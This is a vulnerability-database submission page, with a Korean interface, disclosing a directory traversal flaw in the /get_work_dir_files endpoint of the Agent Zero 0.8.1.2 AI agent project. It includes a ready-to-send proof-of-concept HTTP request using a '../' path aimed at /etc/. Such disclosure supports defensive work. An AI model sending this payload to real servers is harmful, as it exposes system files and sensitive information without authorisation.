제출 #546220: frdel Agent Zero 0.8.1.2 File and Directory Information Exposure정보

제목frdel Agent Zero 0.8.1.2 File and Directory Information Exposure
설명Agent-Zero is an AI agent project with 6.4K GitHub favorites, and its /get_work_dir_files interface has a directory traversal vulnerability, which can be used by attackers to obtain the target server architecture and sensitive information GET /get_work_dir_files?path=../../../../../../../etc/ HTTP/1.1 Host: host User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Accept: */* Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: close
원천⚠️ https://github.com/frdel/agent-zero
사용자
 ekkoo (UID 83509)
제출2025. 03. 30. PM 07:09 (1 년도 ago)
모더레이션2025. 04. 13. PM 07:42 (14 days later)
상태수락
VulDB 항목304588 [frdel Agent-Zero 0.8.1.2 /get_work_dir_files path 디렉토리 순회]
포인트들20

이전개요다음

Want to stay up to date on a daily basis?

Enable the mail alert feature now!